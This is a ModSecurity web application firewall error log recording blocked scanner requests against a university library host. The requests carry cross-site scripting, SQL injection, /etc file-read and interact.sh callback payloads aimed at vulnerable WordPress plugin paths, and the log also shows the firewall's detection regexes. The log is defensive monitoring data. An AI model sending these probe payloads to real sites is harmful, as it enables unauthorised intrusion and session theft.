[Tue Aug 29 11:53:33.645673 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15zcCo-f0AAAn407UAAAAW"]
[Tue Aug 29 11:53:34.023199 2023] [:error] [pid 2620] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zsCo-f0AAAo8OKUAAAAY"]
[Tue Aug 29 11:53:35.972016 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAowNrUAAAAH"]
[Tue Aug 29 11:53:37.323465 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150cCo-f0AAAfWOYkAAAAL"]
[Tue Aug 29 11:53:39.081366 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO1508Co-f0AAAn408gAAAAW"]
[Tue Aug 29 11:53:41.899387 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAAowNsYAAAAH"]
[Tue Aug 29 11:53:42.652529 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAApHRVMAAAAP"]
[Tue Aug 29 11:53:42.798974 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAoLfWQAAAAG"]
[Tue Aug 29 11:53:43.716609 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAAolKY4AAAAe"]
[Tue Aug 29 11:53:43.721395 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAAn4088AAAAW"]
[Tue Aug 29 11:53:45.537091 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAAo2m6gAAAAA"]
[Tue Aug 29 11:53:45.540296 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO152cCo-f0AAAolKZEAAAAe"]
[Tue Aug 29 11:53:45.673653 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAApHRWAAAAAP"]
[Tue Aug 29 11:53:46.837466 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO152sCo-f0AAAoW7UYAAAAJ"]
[Tue Aug 29 11:53:47.767310 2023] [:error] [pid 2632] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO1528Co-f0AAApIdjwAAAAU"]
[Tue Aug 29 11:53:50.794947 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO153sCo-f0AAApJDUMAAAAY"]
[Tue Aug 29 11:53:51.705570 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/product.php"] [unique_id "ZO1538Co-f0AAAn40@wAAAAW"]
[Tue Aug 29 11:53:51.727204 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAApLWkcAAAAI"]
[Tue Aug 29 11:53:52.799741 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154MCo-f0AAAo2m70AAAAA"]
[Tue Aug 29 11:53:53.094031 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154cCo-f0AAAowNtcAAAAH"]
[Tue Aug 29 11:53:53.591706 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAAofm@8AAAAX"]
[Tue Aug 29 11:53:54.540139 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAAofm-EAAAAX"]
[Tue Aug 29 11:53:55.676864 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO1548Co-f0AAAoPufcAAAAM"]
[Tue Aug 29 11:53:55.859209 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAoLfXwAAAAG"]
[Tue Aug 29 11:53:56.548937 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:!'><sVg/OnLoAD. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:!'><sVg/OnLoAD: !'><sVg/OnLoAD"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/Login"] [unique_id "ZO155MCo-f0AAAoAk2kAAAAC"]
[Tue Aug 29 11:53:56.633145 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:error_description: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAAox7MUAAAAN"]
[Tue Aug 29 11:54:00.551941 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAAoAk3UAAAAC"]
[Tue Aug 29 11:54:00.556895 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAApJDWIAAAAY"]
